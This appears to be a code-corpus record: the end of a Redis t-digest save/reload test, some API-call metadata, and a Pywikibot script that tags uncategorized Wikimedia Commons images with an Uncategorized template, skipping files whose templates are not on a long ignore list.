redis.exceptions.ResponseError, self.cmd, "tdigest.info", "tdigest", 1
)
def test_save_load(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for _ in range(1, 101):
self.assertOk(self.cmd("tdigest.add", "tdigest", 1.0, 1.0))
self.assertEqual(True, self.cmd("SAVE"))
mem_usage_prior_restart = self.cmd("MEMORY", "USAGE", "tdigest")
self.restart_and_reload()
        # assert the sketch and its merged weight of 100 survived the reload
self.assertEqual(1, self.cmd("EXISTS", "tdigest"))
self.assertEqual(
100,
float(
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Merged weight"]
),
)
mem_usage_after_restart = self.cmd("MEMORY", "USAGE", "tdigest")
self.assertEqual(mem_usage_prior_restart, mem_usage_after_restart)
|
[
"random.random",
"RLTest.Env"
] |
[((578, 603), 'RLTest.Env', 'Env', ([], {'decodeResponses': '(True)'}), '(decodeResponses=True)\n', (581, 603), False, 'from RLTest import Env\n'), ((2793, 2808), 'random.random', 'random.random', ([], {}), '()\n', (2806, 2808), False, 'import random\n'), ((4350, 4365), 'random.random', 'random.random', ([], {}), '()\n', (4363, 4365), False, 'import random\n'), ((4395, 4410), 'random.random', 'random.random', ([], {}), '()\n', (4408, 4410), False, 'import random\n')]
|
#!/usr/bin/python
"""
Program to add uncat template to images without categories at commons.
See imagerecat.py to add these images to categories.
This script works on the given site, so to handle Commons the site commons
must be given, not a Wikipedia or a similar project.
¶ms;
"""
#
# (C) Pywikibot team, 2008-2020
#
# Distributed under the terms of the MIT license.
#
from contextlib import suppress
from datetime import timedelta
import pywikibot
from pywikibot.exceptions import ArgumentDeprecationWarning
from pywikibot import pagegenerators
from pywikibot.tools import issue_deprecation_warning
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
# Probably unneeded because these are hidden categories. Have to figure it out.
ignoreCategories = ['[[Category:CC-BY-SA-3.0]]',
'[[Category:GFDL]]',
'[[Category:Media for cleanup]]',
'[[Category:Media lacking a description]]',
'[[Category:Media lacking author information]]',
'[[Category:Self-published work]]']
# Don't bother to put the template on an image with one of these templates
skipTemplates = ['Delete',
'Nocat',
'No license',
'No permission since',
'No source',
'No source since',
'Uncategorized',
'Uncat']
# Ignore templates in this long list when looking for relevant categories
ignoreTemplates = ['1000Bit',
'1922 cyc',
'2MASS',
'Aa',
'Ab',
'AbuGhraibPic',
'ADRM',
'ADRM2',
'AerialPhotograph-mlitJP',
'Af',
'Agência Brasil',
'AgenciaBrasil',
'AgenciaCamaraBr',
'AgenciaSenadoBr',
'Ak',
'AL2TB',
'Alabordache',
'Alexj2002C220PD',
'Alexj2002InkscapePD',
'Aln',
'Als',
'Am',
'An',
'Ang',
'Anonymous work',
'AnotherAuthor',
'Apache',
'Ar',
'Arc',
'Arn',
'Artistic-2',
'As',
'Ashipilin',
'AskedForInfo',
'Ast',
'AstronautPhoto',
'Attribution',
'Attribution Entomart',
'Attribution-Ubisoft',
'Auroranorthlicense',
'Author-de',
'Autorisation photos aériennes <NAME>',
'Autotravel',
'Av',
'Avk',
'Ay',
'Az',
'Ba',
'BadJPEG',
'Bar',
'BArch-License',
'BArch-link',
'Bat-smg',
'Bcl',
'Be',
'Be-tarask',
'Be-x-old',
'BeeldbankVenW',
'Bg',
'Bh',
'Bi',
'Blue Marble',
'Bm',
'Bmz',
'Bn',
'Bo',
'Botev license',
'Botev relicensed',
'BotMoveToCommons',
'Bpy',
'Br',
'Bs',
'BSD',
'BSDwithdisclaimer',
'Byp',
'C0',
'Ca',
'CatedralDeSal',
'Cc',
'CC-AR-Presidency',
'Cc-by',
'Cc-by-1.0',
'Cc-by-1.0-nl',
'Cc-by-2.0',
'Cc-by-2.0-at',
'Cc-by-2.0-be',
'Cc-by-2.0-br',
'Cc-by-2.0-cl',
'Cc-by-2.0-de',
'Cc-by-2.0-es',
'Cc-by-2.0-fr',
'Cc-by-2.0-it',
'Cc-by-2.0-kr',
'Cc-by-2.0-nl',
'Cc-by-2.0-uk',
'Cc-by-2.1-au',
'Cc-by-2.1-es',
'Cc-by-2.1-jp',
'Cc-by-2.5',
'Cc-by-2.5-bg',
'Cc-by-2.5-br',
'Cc-by-2.5-dk',
'Cc-by-2.5-es',
'Cc-by-2.5-in',
'Cc-by-2.5-it',
'Cc-by-2.5-my',
'Cc-by-2.5-nl',
'Cc-by-2.5-pl',
'Cc-by-2.5-se',
'Cc-by-2.5,2.0,1.0',
'Cc-by-3.0',
'Cc-by-3.0-gr',
'Cc-by-3.0-IndiaFM',
'Cc-by-3.0-nl',
'Cc-by-3.0-rs',
'Cc-by-3.0-us',
'Cc-by-3.0,2.5,2.0,1.0',
'Cc-by-all',
'Cc-by-nc-sa-2.0-dual',
'Cc-by-sa',
'Cc-by-sa-1.0',
'Cc-by-sa-1.0-fi',
'Cc-by-sa-1.0-tw',
'Cc-by-sa-2.0',
'Cc-by-sa-2.0-at',
'Cc-by-sa-2.0-au',
'Cc-by-sa-2.0-be',
'Cc-by-sa-2.0-br',
'Cc-by-sa-2.0-ca',
'Cc-by-sa-2.0-cl',
'Cc-by-sa-2.0-de',
'Cc-by-sa-2.0-es',
'Cc-by-sa-2.0-fr',
'Cc-by-sa-2.0-it',
'Cc-by-sa-2.0-kr',
'Cc-by-sa-2.0-nl',
'Cc-by-sa-2.0-tw',
'Cc-by-sa-2.0-uk',
'Cc-by-sa-2.1-au',
'Cc-by-sa-2.1-es',
'Cc-by-sa-2.1-jp',
'Cc-by-sa-2.5',
'CC-BY-SA-2.5',
'Cc-by-sa-2.5-ar',
'Cc-by-sa-2.5-au',
'Cc-by-sa-2.5-bg',
'Cc-by-sa-2.5-br',
'Cc-by-sa-2.5-ca',
'Cc-by-sa-2.5-ch',
'Cc-by-sa-2.5-cl',
'Cc-by-sa-2.5-cn',
'Cc-by-sa-2.5-de',
'Cc-by-sa-2.5-dk',
'Cc-by-sa-2.5-es',
'Cc-by-sa-2.5-hu',
'Cc-by-sa-2.5-in',
'Cc-by-sa-2.5-it',
'Cc-by-sa-2.5-mx',
'Cc-by-sa-2.5-my',
'Cc-by-sa-2.5-nl',
'Cc-by-sa-2.5-pl',
'Cc-by-sa-2.5-pt',
'Cc-by-sa-2.5-se',
'Cc-by-sa-2.5-si',
'Cc-by-sa-2.5-tw',
'Cc-by-sa-2.5,1.0',
'Cc-by-sa-2.5,2.0,1.0',
'Cc-by-sa-2.5,2.0,1.0-no-link',
'Cc-by-sa-3.0',
'Cc-by-sa-3.0-gr',
'Cc-by-sa-3.0-nl',
'Cc-by-sa-3.0-rs',
'Cc-by-sa-3.0-tw',
'Cc-by-sa-3.0-us',
'Cc-by-sa-3.0,2.5,2.0,1.0',
'Cc-by-sa-3.0,2.5,2.0,1.0-no-link',
'Cc-by-sa-all',
'Cc-by-sa-jul',
'CC-LukeFord',
'Cc-pd',
'Cc-sa-1.0',
'Cc-zero',
'Cdo',
'Ce',
'Ceb',
'CeCILL',
'CERN-CMS',
'Ch',
'China-PD',
'Cho',
'Chr',
'Chuck',
'Chy',
'Cityview',
'Cityview2',
'Civertan license',
'Claude',
'CNG',
'Co',
'Coa-Germany-b1945',
'Coloured SVG boxes',
'Common Public License',
'Contact-VP',
'Convert to SVG',
'CopyAttribEmail',
'Copyright by Wikimedia',
'Copyright jalpeyrie',
'Copyrighted free use',
'Copyrighted free use provided that',
'Copyrighted IOC',
'CopyrightedFreeUse',
'CopyrightedFreeUse-Link',
'Cr',
'Created by ForrestSjap',
'Created with Inkscape',
'Creator',
'Credit line',
'Credits-panoramafotos.net',
'Crh',
'Crh-cyrl',
'Croatian currency',
'Cs',
'Csb',
'Cu',
'Cv',
'Cy',
'Cz',
'Da',
'Date',
'De',
'De-cc-by-sa-2.0',
'<NAME>',
'Diq',
'DMonniaux',
'DMonniaux-DADVSI-20060507',
'Dsb',
'DSL',
'Dum',
'Dv',
'Dz',
'EdwardCurtis',
'Ee',
'EEK banknote',
'EEK coin',
'El',
'Elephants Dream',
'Eml',
'En',
'En icon',
'Eo',
'EPL',
'Erin Silversmith Licence',
'Es',
'EST-Land Board',
'Estremeñu',
'Et',
'Eu',
'EU location',
'Euro coin common face',
'Europe location',
'Expat',
'Ext',
'Fa',
'FAL',
'Fancyfootworklicense',
'Faroe stamps',
'Fcb981c',
'Ff',
'Fi',
'FirefoxWiki',
'Fiu-vro',
'Fj',
'Flag-Germany-b1945',
'Flickr',
'Flickr-change-of-license',
'Flickr-unfree-but',
'Flickrreview',
'Fo',
'FOLP',
'FOP',
'Fr',
'Fr icon',
'Frc',
'Free screenshot',
'Frp',
'Fur',
'FWL',
'Fy',
'Ga',
'Gag',
'Gakk Copyright',
'Gan',
'Gd',
'Geograph',
'GFDL',
'GFDL or cc-by-nc-sa',
'GFDL or cc-by-nc-sa/2.5',
'GFDL-1.2',
'GFDL-1.2-en',
'GFDL-CC-triple',
'GFDL-DD',
'GFDL-en',
'GFDL-GMT',
'GFDL-Institut de Qualitat Agroalimentària',
'GFDL-IS',
'GFDL-it',
'GFDL-ja',
'GFDL-Landsat-Kashmir3d',
'GFDL-OpenGeoDB',
'GFDL-retouched',
'GFDL-Samoborac',
'GFDL-self',
'GFDL-Self',
'GFDL-self-en',
'GFDL-user',
'GFDL-user-als',
'GFDL-user-ar',
'GFDL-user-bat-smg',
'GFDL-user-bs',
'GFDL-user-cs',
'GFDL-user-da',
'GFDL-user-de',
'GFDL-user-el',
'GFDL-user-en',
'GFDL-user-en-no-disclaimers',
'GFDL-user-en-note',
'GFDL-user-en-with-disclaimers',
'GFDL-user-es',
'GFDL-user-fa',
'GFDL-user-fi',
'GFDL-user-fr',
'GFDL-user-gl',
'GFDL-user-he',
'GFDL-user-hi',
'GFDL-user-hu',
'GFDL-user-id',
'GFDL-user-it',
'GFDL-user-ja',
'GFDL-user-ko',
'GFDL-user-lt',
'GFDL-user-nl',
'GFDL-user-nn',
'GFDL-user-no',
'GFDL-user-pl',
'GFDL-user-pt',
'GFDL-user-ru',
'GFDL-user-sk',
'GFDL-user-sq',
'GFDL-user-tr',
'GFDL-user-uk',
'GFDL-user-vi',
'GFDL-user-vls',
'GFDL-user-w',
'GFDL-user-zh',
'Giovannino Copyright',
'Gl',
'Glk',
'Gloumouth1Credit',
'Gn',
'GNOME-icon-theme',
'Got',
'GPL',
'GPLv2 only',
'GPLv3',
'Gr',
'Grays Anatomy plate',
'Gu',
'Gv',
'GWArt',
'GWArtOld',
'GWPDA',
'Ha',
'HAER',
'Hak',
'Halibutt Copyright GFDL',
'Halibutt Copyright Ogg',
'HALS',
'Harry',
'Harry2',
'Haw',
'He',
'Heraldic Badge',
'Hi',
'Hiuppo Copyright GFDL',
'Ho',
'Hr',
'Hsb',
'Ht',
'Hu',
'Hy',
'Hz',
'Ia',
'Ibiblio-Hyperwar.org',
'Icelandic currency',
'Icelandic stamp',
'Id',
'Ie',
'Ig',
'Ii',
'Ik',
'Ike-latn',
'Ilo',
'ImageUpload',
'Img-confirmation',
'INewton',
'Information',
'Information Picswiss',
'Inkscape',
'Insignia',
'Insignia Catalonia',
'Insignia Navarre',
'Io',
'IPPAR',
'Is',
'It',
'It icon',
'Iu',
'Ja',
'Ja2',
'<NAME> permission',
'Jbo',
'Jean-PolGRANDMONTCredit',
'JewishEncyclopedia',
'Joergens.mi licence',
'JPEG version of PNG',
'Jv',
'Ka',
'Kaa',
'Kab',
'Kameno doba',
'Kg',
'Ki',
'Kirkeinfo',
'Kirkenorge',
'Kj',
'Kk',
'Kl',
'Km',
'Kn',
'Ko',
'Kopimi',
'Kr',
'Krj',
'Ks',
'Ksh',
'Ku',
'Kv',
'Kw',
'Ky',
'La',
'LA2-Blitz',
'Lad',
'Lan',
'LarsenCopyright',
'Lb',
'Lbe',
'Lfn',
'Lg',
'LGPL',
'Li',
'LibriVox public domain',
'License',
'Lij',
'LinuxeristCopyright',
'Lld',
'Lmo',
'Ln',
'Lo',
'LOC-image',
'LOC-pchrom',
'LOC-prok',
'LOC-prokc',
'Location',
'Location dec',
'Location dms',
'LocationRequired',
'Lothar1976',
'Loz',
'Ls',
'Lt',
'Lueger',
'Lv',
'LviatourCredit',
'Map of Japan-Shigenobu AOKI',
'Map-Austria-GNu',
'Marine-marchande.net',
'MartinX',
'Master son',
'MdB',
'Mdf',
'Met.no',
'Mg',
'Mh',
'Mi',
'Mildenhall',
'MindInfo',
'MIT',
'Mk',
'Ml',
'MLDoan',
'Mn',
'Mo',
'MoengCredit',
'Money-EU banknote',
'Money-Eu',
'Money-REAL',
'MORS',
'MPL',
'Mr',
'Ms',
'Mt',
'MTL',
'Museum.ru',
'My',
'Myv',
'Mzn',
'Na',
'Nah',
'Namespace',
'NAMESPACE',
'Nap',
'NAUMANN',
'Nb',
'Nds',
'Nds-nl',
'Ne',
'NetMarine',
'New',
'Newsflash Photo',
'Ng',
'NGC7000',
'NGruev',
'NGW',
'Ngw2',
'Nickshanks-cc-by-2.0-email',
'Njegos.org',
'Nl',
'Nl icon',
'Nn',
'Nn icon',
'No',
'No icon',
'Non',
'Norges Golfforbund',
'Norwegian coat of arms',
'Not-PD-US-URAA',
'Nov',
'Nrbelex Photo',
'Nrbelex Photo 400D',
'Nrm',
'Nso',
'Nv',
'Ny',
'NYC Subway map',
'NYPL-image-full',
'OAL',
'Object location',
'Oc',
'OldOS',
'Olessi Copyright Ogg',
'Om',
'Open Beelden',
'Open Font',
'Openphotoreview',
'Or',
'Originally uploaded',
'Os',
'OsborneFossils',
'OTrondal',
'OTRS',
'Otrs pending',
'OTRS pending',
'Own',
'Own work',
'Pa',
'Pag',
'PAGENAME',
'PAGENAMEE',
'Painting',
'Pam',
'Pap',
'Parlament.ch',
'PAshieldsource',
'PBresseler',
'PCL',
'PD',
'PD Colombia',
'PD patents',
'PD-1923',
'PD-AB-exempt',
'PD-Abdul Hamid',
'PD-AIGA',
'PD-Albania-exempt',
'PD-Algeria',
'PD-AM-exempt',
'PD-ancient-script',
'PD-AR-Anonymous',
'PD-AR-Movie',
'PD-AR-Photo',
'PD-Archivesnormandie',
'PD-Armenia',
'PD-Art',
'PD-art',
'PD-art-life-70',
'PD-art-US',
'PD-Art-YorckProject',
'PD-Australia',
'PD-AustrianGov',
'PD-author',
'PD-AZ-exempt',
'PD-Azerbaijan',
'PD-Bahrain',
'PD-Bain',
'PD-Bangladesh',
'PD-because',
'PD-BH-exempt',
'PD-BnFMandragorePic',
'PD-Brady-Handy',
'PD-Brazil-media',
'PD-BrazilGov',
'PD-Britannica',
'PD-Brockhaus&Efron',
'PD-BulgarianGov',
'PD-BW',
'PD-BY-exempt',
'PD-Canada',
'PD-Canada-creator',
'PD-Canada-Crown',
'PD-Canada-photo',
'PD-Canada-stamp',
'PD-Challenger Report',
'PD-chem',
'PD-Chile',
'PD-China',
'PD-Coa-Finland',
'PD-Coa-Germany',
'PD-Coa-Hungary',
'PD-Coins-Krenzer',
'PD-collective anonymous work',
'PD-copyright holder',
'PD-Croatia',
'PD-CroatiaGov',
'PD-CSIRO',
'PD-Cuba',
'PD-CzechGov',
'PD-DAUI',
'PD-DBZ stamps',
'PD-Demis',
'PD-Denmark50',
'PD-DenmarkEVH',
'PD-Detroit',
'PD-Deutsche Bundespost stamps',
'PD-Edison Records',
'PD-EE-exempt',
'PD-EEA',
'PD-Egypt',
'PD-EstoniaPub',
'PD-EU-no author disclosure',
'PD-Feldman-1905',
'PD-Fiji',
'PD-Finland',
'PD-Finland50',
'PD-FinlandGov',
'PD-flag',
'PD-Flag',
'PD-flag-50',
'PD-Flag-Germany',
'PD-FLGov',
'PD-font',
'PD-FOP-DE',
'PD-Fröléens konversationslexikon',
'PD-GallicaPic',
'PD-GDR stamps',
'PD-GE-exempt',
'PD-Generic',
'PD-German Empire stamps',
'PD-German postmarks',
'PD-German stamps',
'PD-GermanGov',
'PD-Google books',
'PD-Gottscho',
'PD-GreekGov',
'PD-Gutenberg',
'PD-heirs',
'PD-Highsmith',
'PD-HK',
'PD-HK-PR',
'PD-HU-exempt',
'PD-Hubble',
'PD-IDGov',
'PD-IDOld-Art29',
'PD-IDOld-Art30',
'PD-imf.org',
'PD-India',
'PD-ineligible',
'PD-Internationale',
'PD-Iran',
'PD-Iraq',
'PD-Ireland',
'PD-IrishGov',
'PD-Israel',
'PD-Israel-Photo',
'PD-ItalyGov',
'PD-Japan',
'PD-Japan-exempt',
'PD-Japan-film',
'PD-Japan-oldphoto',
'PD-Japan-organization',
'PD-Jordan',
'PD-Jordan-Photo',
'PD-JORF',
'PD-JORF-nor-conso',
'PD-Kenya',
'PD-KG-exempt',
'PD-Kuwait',
'PD-KZ-exempt',
'PD-Lebanon',
'PD-Libya',
'PD-link',
'PD-LOC',
'PD-Look',
'PD-LosAlamos',
'PD-Lozinski',
'PD-LT-exempt',
'PD-LV-exempt',
'PD-MacaoGov',
'PD-magic',
'PD-Malawi',
'PD-Manchukuo-stamps',
'PD-MapLibrary',
'PD-Mauritius',
'PD-MD-exempt',
'PD-Mexico',
'PD-Mexico-NIP',
'PD-Meyers',
'PD-Meyers-5th-edition',
'PD-Meyers-6th-edition',
'PD-MNGov',
'PD-MO',
'PD-money-Romania',
'PD-Morocco',
'PD-Namibia',
'PD-National Photo Company',
'PD-Nigeria',
'PD-NL-gemeentevlag',
'PD-NL-gemeentewapen',
'PD-NL-Gov',
'PD-NL-verkeersbord',
'PD-Nordens Flora',
'PD-North Korea',
'PD-Norway50',
'PD-NorwayGov',
'PD-NTBB',
'PD-NZ',
'PD-NZ-50-years',
'PD-old',
'Pd-old',
'PD-Old',
'PD-old-100',
'PD-old-50',
'PD-old-70',
'PD-old-75',
'PD-old-80',
'PD-old-Edition',
'PD-Oman',
'PD-OpenClipart',
'PD-Orgelbrand',
'PD-Ornament1898',
'PD-Pakistan',
'PD-PCL-portraits',
'PD-PDFnet',
'PD-PDphoto.org',
'PD-Peru',
'PD-Philippines',
'PD-PhilippinesPubDoc',
'PD-PMR-exempt',
'PD-Polish',
'PD-Polishsymbol',
'PD-PRC-exempt',
'PD-PT',
'PD-retouched-user',
'PD-retouched-user-w',
'PD-RO-exempt',
'PD-ROC-exempt',
'PD-ROC-Traffic Indicating Lines',
'PD-ROC-Traffic Signs',
'PD-RU-exempt',
'PD-RusEmpire',
'PD-Russia',
'PD-Russia-2008',
'PD-SAGov',
'PD-Saudi Arabia',
'PD-SBH',
'PD-scan',
'PD-Scan',
'PD-SCGGov',
'PD-ScottForesman',
'PD-ScottForesman-raw',
'PD-script',
'PD-Seal-Germany',
'PD-Seattle-Neighborhood-Atlas',
'PD-SeaWiFS',
'PD-self',
'PD-self2',
'PD-SerbiaGov',
'PD-Seychelles',
'PD-SFJ',
'PD-shape',
'PD-Sjöfartsverket',
'PD-SlovakGov',
'PD-South Korea',
'PD-South-Africa',
'PD-Soviet-revised',
'PD-SRBGov',
'PD-STFP',
'PD-StVZVO',
'PD-Sudan',
'PD-Suomen',
'PD-Sweden',
'PD-Sweden-1969',
'PD-Sweden-photo',
'PD-Sweden-self',
'PD-Switzerland-official',
'PD-Switzerland-photo',
'PD-Syria',
'PD-Taiwan',
'PD-text',
'PD-textlogo',
'PD-TH-exempt',
'PD-Thailand',
'PD-TJ-exempt',
'PD-TK-exempt',
'PD-TR-Gov',
'PD-Traditional',
'PD-Tunisia',
'PD-UA-exempt',
'PD-UEA',
'PD-Uganda',
'PD-Ugglan',
'PD-UK-known',
'PD-UK-unknown',
'PD-UKGov',
'PD-Ukraine',
'PD-UN',
'PD-United Arab Emirates',
'PD-URAA',
'PD-Uruguay',
'PD-US',
'PD-US-1978-89',
'PD-US-flag',
'PD-US-no notice',
'PD-US-not renewed',
'PD-US-patent',
'PD-US-patent-no notice',
'PD-US-record',
'PD-user',
'PD-User',
'PD-user-als',
'PD-user-ar',
'PD-user-ca',
'PD-user-cs',
'PD-user-da',
'PD-user-de',
'PD-user-en',
'PD-user-fa',
'PD-user-fr',
'PD-user-he',
'PD-user-hi',
'PD-user-hr',
'PD-user-hu',
'PD-user-it',
'PD-user-ja',
'PD-user-lt',
'PD-user-nl',
'PD-user-nn',
'PD-user-no',
'PD-user-pl',
'PD-user-pt',
'PD-user-ro',
'PD-user-ru',
'PD-user-sk',
'PD-user-sl',
'PD-user-th',
'PD-user-uk',
'PD-user-vls',
'PD-user-w',
'PD-user-zh',
'PD-USGov',
'PD-USGov-ARM',
'PD-USGov-Atlas',
'PD-USGov-Award',
'PD-USGov-BLM',
'PD-USGov-CIA',
'PD-USGov-CIA-WF',
'PD-USGov-Congress',
'PD-USGov-Congress-AOC',
'PD-USGov-Congress-Bio',
'PD-USGov-DEA',
'PD-USGov-DHS',
'PD-USGov-DHS-CG',
'PD-USGov-DHS-CGAUX',
'PD-USGov-DOC',
'PD-USGov-DOC-Census',
'PD-USGov-DOE',
'PD-USGov-DOJ',
'PD-USGov-DOL',
'PD-USGov-DOS',
'PD-USGov-DOT',
'PD-USGov-DVA',
'PD-USGov-ED',
'PD-USGov-EPA',
'PD-USGov-FAA',
'PD-USGov-FBI',
'PD-USGov-FDA',
'PD-USGov-Federal Reserve',
'PD-USGov-FEMA',
'PD-USGov-FSA',
'PD-USGov-FWS',
'PD-USGov-HHS',
'PD-USGov-HHS-CDC',
'PD-USGov-HHS-NIH',
'PD-USGov-Interior',
'PD-USGov-Interior-HABS',
'PD-USGov-Interior-MMS',
'PD-USGov-Interior-USBR',
'PD-USGov-Interior-USGS-Minerals',
'PD-USGov-Military',
'PD-USGov-Military award',
'PD-USGov-Military-Air Force',
'PD-USGov-Military-Air Force Auxiliary',
'PD-USGov-Military-Army',
'PD-USGov-Military-Army-USACE',
'PD-USGov-Military-Army-USACMH',
'PD-USGov-Military-Army-USAIOH',
'PD-USGov-Military-Badge',
'PD-USGov-Military-Coast Guard',
'PD-USGov-Military-DVIC',
'PD-USGov-Military-Marines',
'PD-USGov-Military-MDA',
'PD-USGov-Military-National Guard',
'PD-USGov-Military-Navy',
'PD-USGov-Military-NGA',
'PD-USGov-money',
'PD-USGov-MUTCD',
'PD-USGov-NASA',
'PD-USGov-NASA/copyright',
'PD-USGov-NCBI-scienceprimer',
'PD-USGov-NIH',
'PD-USGov-NIST',
'PD-USGov-NOAA',
'PD-USGov-NPS',
'PD-USGov-NRO',
'PD-USGov-NSA',
'PD-USGov-NSF',
'PD-USGov-NTSB',
'PD-USGov-POTUS',
'PD-USGov-State',
'PD-USGov-Treasury',
'PD-USGov-TVA',
'PD-USGov-USAID',
'PD-USGov-USDA',
'PD-USGov-USDA-ARS',
'PD-USGov-USDA-FS',
'PD-USGov-USDA-NAL',
'PD-USGov-USDA-NRCS',
'PD-USGov-USGS',
'PD-USGov-USIA',
'PD-USGov-VOA',
'PD-USGov-WPA',
'PD-USNWR',
'PD-UZ-exempt',
'PD-Van Vechten',
'PD-Vegagerdin',
'PD-Venezuela',
'PD-Vietnam',
'PD-VL-shield',
'PD-Vlaams-gemeentewapen',
'PD-Vlaamse-gemeentevlag',
'PD-VzKat',
'PD-WorldWind',
'PD-Yemen',
'PD-Yugoslavia',
'PD-Zimbabwe',
'Pd',
'Pdc',
'Peregrine981',
'PermissionOTRS',
'PermissionOTRS-ID',
'Personality rights',
'Photo-by-Wojciechowscy-GFDL',
'Photocity.ru',
'PhotoManifs-PP',
'Photos by <NAME>',
'Photos by Kulturhistorisk museum',
'Photos by Stortinget',
'Photos by the Norwegian Museum of Cultural History',
'Pi',
'Picswiss',
'Piratpartiet',
'Pl',
'Pl icon',
'PLoS',
'Pms',
'PNG with JPEG version',
'Pnt',
'Polish coats of arms by <NAME>',
'PolishPresidentCopyright',
'PolishSenateCopyright',
'Polishsymbol',
'Politas FZ30',
'Portpictures.nl',
'Pousbeeld',
'Pressefotos Die Gruenen',
'Ps',
'Pt',
'Pt icon',
'Pt-br',
'Qu',
'QualityImage',
'RadioSenadoBr',
'RetouchedPicture',
'Rm',
'Rmy',
'Rn',
'Ro',
'Roa-rup',
'RomanianMCTICopyright',
'RTCNCA License',
'Rtl-lang',
'Ru',
'Rw',
'Sa',
'Sah',
'Sc',
'Scn',
'Sco',
'Sd',
'Sdc',
'Se',
'Seattle Neighborhood Atlas disclaimer',
'Second Life',
'Sei',
'SejmCopyright',
'Self',
'Self2',
'Self2-name',
'Self3',
'Self4',
'Self-GFDL-German',
'SelfSA-GFDL-German',
'SenadoMexico',
'Sergeymila',
'Sg',
'SgiraldoaCredit',
'Sh',
'Shi',
'Si',
'SIB',
'Simple',
'Simple English',
'Sk',
'Sl',
'Sm',
'Sma',
'Sn',
'So',
'Solkoll',
'Solkoll 2D',
'Solkoll 3D',
'South Korean currency',
'SpaceShuttle',
'SPD-Parteivorstand',
'Spui',
'Spuiother',
'Sq',
'Sr',
'Srn',
'Ss',
'St',
'Stan Shebs photo',
'Stationsweb',
'Statistics Netherlands map',
'Stielers Handatlas 1891',
'Stortinget3',
'Stq',
'Stratosphere',
'Su',
'SupersededPNG',
'SupersededSVG',
'Supported by Wikimedia France',
'Sv',
'Svensk porträttgalleri',
'Svg',
'SVG',
'SVG-Map Africa by Slomox',
'Sw',
'Swiss Government Portrait',
'SygnaturaPixela',
'Szl',
'Ta',
'Tango',
'Taxonavigation',
'Tcolphoto',
'Te',
'Texas State Highway',
'Tet',
'Tg',
'Tgl',
'Tintazul',
'Th',
'ThomasBredolCredit2',
'ThomasBredolCredit3',
'Ti',
'Tk',
'Tl',
'Tlx',
'Tn',
'To',
'TomCorserCredit',
'Tpi',
'Tr',
'Trademark',
'Trademarked',
'Ts',
'Tt',
'Tum',
'TVSenadoBr',
'Tw',
'Ty',
'Tyv',
'Udm',
'Ug',
'Uk',
'UN map',
'Ur',
'User:FlickreviewR/reviewed-pass',
'User:Fir0002/20D',
'USDA',
'UWiscCIMSS',
'Uz',
'Ve',
'Vec',
'Vector-Images.com',
'Vector version available',
'Vi',
'Viollet-le-Duc',
'Vl',
'Vls',
'Vo',
'W',
'Wa',
'Walks.ru',
'War',
'WEF',
'Wikimedia relicensing',
'Wikipedia-screenshot',
'Wikiportrait',
'Wikispecies',
'WLA',
'Wo',
'Wulfstan GFDL',
'Wuu',
'Www.bordeaux-port.fr',
'Www.folketinget.dk',
'Www.hotelviewarea.com',
'Www.nordenskirker.dk',
'Xal',
'XGSC image',
'Xh',
'YAM',
'Ydd',
'Yi',
'Yo',
'Yue',
'Za',
'Zea',
'Zh',
'Zh-classical',
'Zh-cn',
'Zh-hans',
'Zh-hant',
'Zh-hk',
'Zh-min-nan',
'Zh-sg',
'Zh-tw',
'Zh-yue',
'Zlib',
'Zu',
'Zxx',
]
puttext = ('\n{{Uncategorized|year={{subst:CURRENTYEAR}}|'
'month={{subst:CURRENTMONTHNAME}}|day={{subst:CURRENTDAY}}}}')
putcomment = 'Please add categories to this image'
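# Rough preview (added for clarity) of what the {{subst:...}} magic words
# above resolve to once the edit is saved; MediaWiki performs the real
# substitution server-side, with English month names on Commons:
#   from datetime import datetime
#   now = datetime.utcnow()
#   '\n{{Uncategorized|year=%d|month=%s|day=%d}}' % (
#       now.year, now.strftime('%B'), now.day)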
def uploadedYesterday(site):
"""
Return a pagegenerator containing all the pictures uploaded yesterday.
DEPRECATED. Only used by a deprecated option.
"""
today = pywikibot.Timestamp.utcnow()
yesterday = today + timedelta(days=-1)
for logentry in site.logevents(
logtype='upload', start=yesterday, end=today, reverse=True
):
yield logentry.page()
def isUncat(page):
"""
Do we want to skip this page.
If we found a category which is not in the ignore list it means
that the page is categorized so skip the page.
If we found a template which is in the ignore list, skip the page.
"""
pywikibot.output('Working on ' + page.title())
for category in page.categories():
if category not in ignoreCategories:
pywikibot.output('Got category ' + category.title())
return False
for template_with_trail in page.templates():
        # Strip off trailing garbage
template = template_with_trail.title().rstrip('\n').rstrip()
if template in skipTemplates:
# Already tagged with a template, skip it
pywikibot.output('Already tagged, skip it')
return False
if template in ignoreTemplates:
# template not relevant for categorization
pywikibot.output('Ignore ' + template)
else:
pywikibot.output('Not ignoring ' + template)
return False
return True
def addUncat(page):
"""
Add the uncat template to the page.
@param page: Page to be modified
@type page: pywikibot.Page
"""
newtext = page.get() + puttext
pywikibot.showDiff(page.get(), newtext)
with suppress(pywikibot.EditConflict, pywikibot.LockedPage):
page.put(newtext, putcomment)
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: str
"""
generator = None
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
if site.code != 'commons' or site.family.name != 'commons':
pywikibot.warning('This script is primarily written for Wikimedia '
'Commons, but has been invoked with site {0}. It '
'might work for other sites but there is no '
'guarantee that it does the right thing.'
.format(site))
choice = pywikibot.input_choice(
'How do you want to continue?',
(('Continue using {0}'.format(site), 'c'),
('Switch to Wikimedia Commons', 's'),
('Quit', 'q')),
automatic_quit=False)
if choice == 's':
site = pywikibot.Site('commons', 'commons')
elif choice == 'q':
return False
gen_factory = pagegenerators.GeneratorFactory(site)
for arg in local_args:
param_arg, sep, param_value = arg.partition(':')
if param_value == '':
param_value = None
if arg.startswith('-yesterday'):
generator = uploadedYesterday(site)
issue_deprecation_warning(
'The usage of "-yesterday"',
'-logevents:"upload,,YYYYMMDD,YYYYMMDD"',
2, ArgumentDeprecationWarning, since='20160305')
else:
gen_factory.handle_arg(arg)
generator = gen_factory.getCombinedGenerator(gen=generator, preload=True)
if not generator:
pywikibot.bot.suggest_help(missing_generator=True)
else:
site.login()
for page in generator:
pywikibot.output(page.title())
if page.exists() and (page.namespace() == 6) \
and (not page.isRedirectPage()):
if isUncat(page):
addUncat(page)
if __name__ == '__main__':
main()
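# A hypothetical invocation sketch (not part of the original script): the bot
# is driven by the standard pywikibot generator options, so -- assuming the
# script is saved as imageuncat.py in a configured pywikibot checkout -- a run
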